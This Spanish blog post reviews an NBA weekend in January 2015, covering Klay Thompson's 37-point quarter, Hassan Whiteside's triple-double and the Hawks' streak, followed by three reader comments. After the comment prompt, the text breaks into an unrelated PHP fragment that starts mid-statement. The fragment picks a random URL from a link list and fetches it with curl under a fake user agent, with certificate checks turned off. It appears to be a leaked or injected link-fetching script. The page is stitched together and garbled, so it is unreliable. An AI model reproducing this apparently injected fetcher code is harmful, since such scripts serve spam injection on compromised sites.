Informe del fin de semana: 37 en 1

26 de January de 2015 por TheDeerHunter

finde_25

Tenía pinta de molar bastante este fin de semana. El bombazo baloncestístico llegaba desde un partido que habíamos calificado de “interés menor”. Vaya linces…

“Pero hoy lo que dara que hablar, es el 3 cuarto que se mando Klay Thompson. Madre mia, estaba en modo bestia/dios metió 37 de los 41 puntos de su equipo en ese cuarto. 9/9 en triples.” Blade Petrovic

Nos contaba Nacho con cierta guasa que sólo había dado una asistencia y que una única canasta de su equipo en el cuarto había sido sin su participación (que en realidad fueron dos tiros libres, así que ni eso). Lo cierto es que hasta que el amigo Klay entró en trance estaba siendo una actuación tirando a floja por parte de los líderes y unos Kings sin Gay cortocircuitado amagaban con subirse a sus barbas. Empezó al tran-tran, más de dos minutos después del comienzo del cuarto. Canasta tras reverso, tapón con triple en contraataque y otro triple, nada que no hubiera hecho otras noches. Tras alley oop a pase de Curry, otro triple más les abría los ojos a él y sus compañeros de cómo estaba el patio. La mayoría de los lanzamientos que enchufó después difícilmente los hubiera intentado sin tal “colocón” de confianza. El resto del equipo, por supuesto, sólo tenía ojos para él. A nadie se le pasó por la cabeza otra cosa que darle el balón a él, como tiene que ser. El resultado, récord histórico de anotación en un cuarto, que estaba en poder al Alimón de Carmelo y “Iceman” Gervin.

“Iba a comentar las dos victorias seguidas de de los Bulls, con sendos partidos serios, parece que un cambio en la dirección de Thibbo (aunque hay cosas que aún me chirrían) y el partidazo ¿cuántos van? de los Hawks ante OKC (que larga se les va a hacer la temporada e igual no llegan), pero lo del chaval lo eclipsa todo.” Nacho

Lo que debía de haber sido el eje de atención de la noche se quedó en una victoria algo cómoda de los Hawks (15ª consecutiva) sobre los Thunder y evocando un poco a la última final de la conferencia Oeste. “La Barba” cumplió su parte derrotando a los Suns con una actuación nivel MVP y buzzer-beater incluido. Los Bulls se llevaron una victoria de mucho mérito en Dallas y parecen haber aparcado momentáneamente las dudas generadas las anteriores semanas. Igual que los Cavs, que le endosaron 129 a los Hornets, 75 antes del descanso, y parece confirmarse que les han sentado estupendamente bien los últimos fichajes.

El resto de jornada tuvo bastante menos historia. Los Raptors ganaron en Philadelphia con ciertas dificultades; los Heat se libraron por los pelos de una derrota en casa ante los Pacers; los Knicks lograron la tercera victoria consecutiva a costa de unos Magic donde Vucevic fue “el mayor esfuerzo en vano”; los Pelicans ganaron en Minneapolis; los Nuggets perdieron otra vez en casa ante Celtics y los Lakers no llegaron a hacer el ridículo del todo en San Antonio.

Sábado

Durante el día nos encontramos con la magnífica y sorprendente noticia de que LaMarcus Aldridge aplazaba hasta el verano la operación que necesita su pulgar y que jugaría esa misma noche. Unas horas más tardes, el fantasma de las lesiones se vengaba a costa de Brandon Jennings, víctima de una rotura del Aquiles justo cuando tanto él como sus Pistons vivían sus mejores momentos en mucho tiempo. El base se lesionó precisamente en Milwaukee, la que fuese su casa antes de mudarse a Detroit y donde los Pistons cayeron con claridad. La otra cara de la moneda se vivió en Portland, donde los gritos de “M-V-P!” recompensaron el esfuerzo y la calidad de Aldridge, que pasó de estar camino del quirófano a liderar el triunfo ante los Wizards.

Además de la cómoda victoria de los Grizzlies frente a los Sixers, la jornada del sábado también sirvió para que los Hornets -que ganaron a los Knicks en un esperpento de partido- arrebataran la octava plaza del Este a unos Nets que fueron apalizados en Salt Lake City.

Domingo

Tras un sábado un tanto insípido, un domingo pletórico. ¿Por dónde empezamos? ¿Qué tal si lo hacemos con un tipo del que no habíamos ni oído hablar antes de 2015, que se había ganado las lentejas en el Líbano, China y la D-League, y cuya tarjeta de presentación fueron 23 puntos y 16 rebotes ante los Clippers hace un par de semanas? A estas alturas ya debéis de saber que hablamos de Hassan Whiteside (para algún despistado que quede, juega en los Heat). El chaval decidió que un partido televisado para todo el país, ante los Bulls, era un buen momento para marcarse un triple doble con 14 puntos, 13 rebotes y 12 tapones… ¡en 25 minutos! El pobre Taj Gibson tendrá pesadillas toda la semana con él. La victoria de los Heat pone de nuevo en evidencia ciertas debilidades de los Bulls, en especial en su propia cancha.

El menú vespertino se completaba con un excelente Thunder-Cavs. Durant vs LeBron, Waiters vs su ex equipo, etc. Lo que nos quedó tras la victoria relativamente cómoda de los Cavaliers fue la clara mejoría del equipo con las últimas incorporaciones y la impresión de que, a poco que lleguen sanos a Playoffs, dará igual la posición porque estos Cavs llevan la etiqueta de favoritos en cualquier eliminatoria del Este. Por parte de los Thunder, destacamos la opinión-pregunta que dejó Triceratops:

¿Alguien puede decirle a Ibaka que deje de tirar triples?

También hay que seguir hablando de los Hawks, cuya racha de victorias ya alcanza las 16, la última ante un rival menor como los Wolves. Atlanta suma ya 37 partidos ganados, una cifra que jamás había alcanzado antes del All Star Weekend, y aun tiene 9 oportunidades para mejor ese registro. El vecino de los Hawks en las alturas de la clasificación, los Warriors, sufrieron pero sacaron adelante el compromiso ante los Celtics. En esta ocasión, Klay Thompson se quedó en 31 puntos de nada.

Otro de los encuentros destacados fue el que los Mavs perdieron en los últimos segundos en New Orleans, donde cuatro tiros libres de Anthony Davis decidieron y provocaron ciertas quejas sobre el arbitraje por parte de Dallas. Los Pelicans aguantan la embestida de los Thunder y conservan sus aspiraciones de Playoffs. Veremos lo que dura. También tuvo miga el triunfo en la prórroga de los Wizards en Denver, donde los Nuggets perdonaron la vida a su rival en varias ocasiones y a punto estuvieron los capitalinos de devolver el favor al final. Faried falló dos tiros libres que pudieron evitar la prórroga, y pareció entonces que los Wizards tomaban el control y se pusieron +5 a 10 segundos para el final. Pero un triple de Wilson Chandler apretó el marcador y a continuación Paul Pierce entregó el balón a Lawson, de regreso tras sus problemas legales y protagonista de una gran actuación, pero cuyo lanzamiento no entró y concedió la victoria a los Wizards.

Por lo demás, la noche del domingo dejó la exhibición de los Clippers en Phoenix, el paseo de Harden y los Rockets sobre los Lakers, la derrota de los Magic ante los Pacers y triunfos locales de Raptors ante Pistons (pese a un enorme Augustin) y de Spurs contra Milwaukee Bucks.

Comenta

3 comentarios a esta entrada

  1. Azabel dice:
    #1

    enorme partido de Lebron para la sexta victoria consecutiva de los Cavs, con el perdon de Curry y Harden, si Lebron alcanza el tercer puesto con los Cavs o dios quiera el segunda, es el MVP de la regular nuevamente, no hay opcion

    con sus defectos J. r. Smith volvio a jugar un gran partido, que respiro es para la ofensiva de los Cavs que cuando se le cierran las defensas encontrar abierto para el tiro a un Smith, que puede anotar los tiros de 3 que ni Waiters ni Marion podian hacer

      Citar

  2. Ruxixón dice:
    #2

    Exactamente esa es la energía que da JR y por la cual se me hace difícil que salga del quinteto,lo que comentábamos el otro día.A mí me pareció un partidazo de Cleveland,manejando los tiempos totalmente.Oklahoma se meterá en PO pero a mí no me da ninguna garantía de cara a PO por más que tengan a Westbrook y Durant.Me imagino una serie contra los Warriors y con el ambiente del Oracle no los veo metiéndoles mano,además que veo que el banquillo de GSW es mucho más profundo y está mucho más metido en dinámica,saben cuáles son los roles,etc.Pero bueno,queda mucho hasta los playoffs,y a saber si no habrá más movimientos en los Thunder,principalmente los 10 minutos de ayer de Reggie Jackson,y viendo lo desconectado que ha estado en sus últimos partidos me parece sintomático.

    Por último quiero apoyar a Denise,que siempre ha sido muy crítico con JV.Yo siempre tiraba de los brotes verdes pero a estas alturas de temporada los Magic parecen desarbolados en defensa,justo donde más deberían destacar.

      Citar

  3. Azabel dice:
    #3

    Ruxixón:
    Exactamente esa es la energía que da JR y por la cual se me hace difícil que salga del quinteto,lo que comentábamos el otro día.A mí me pareció un partidazo de Cleveland,manejando los tiempos totalmente.Oklahoma se meterá en PO pero a mí no me da ninguna garantía de cara a PO por más que tengan a Westbrook y Durant.Me imagino una serie contra los Warriors y con el ambiente del Oracle no los veo metiéndoles mano,además que veo que el banquillo de GSW es mucho más profundo y está mucho más metido en dinámica,saben cuáles son los roles,etc.Pero bueno,queda mucho hasta los playoffs,y a saber si no habrá más movimientos en los Thunder,principalmente los 10 minutos de ayer de Reggie Jackson,y viendo lo desconectado que ha estado en sus últimos partidos me parece sintomático.

    bueno pero comparar a los Warriors con cualquiera de la liga es una aberracion, de hecho comparar su banca con cualquier otro equipo no resulta equitativo, los Warriors tienen saliendo de la banca a Livingston, Barbosa, Rush, Iguodala, lee y Speights, por lejos la mejor de la liga

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>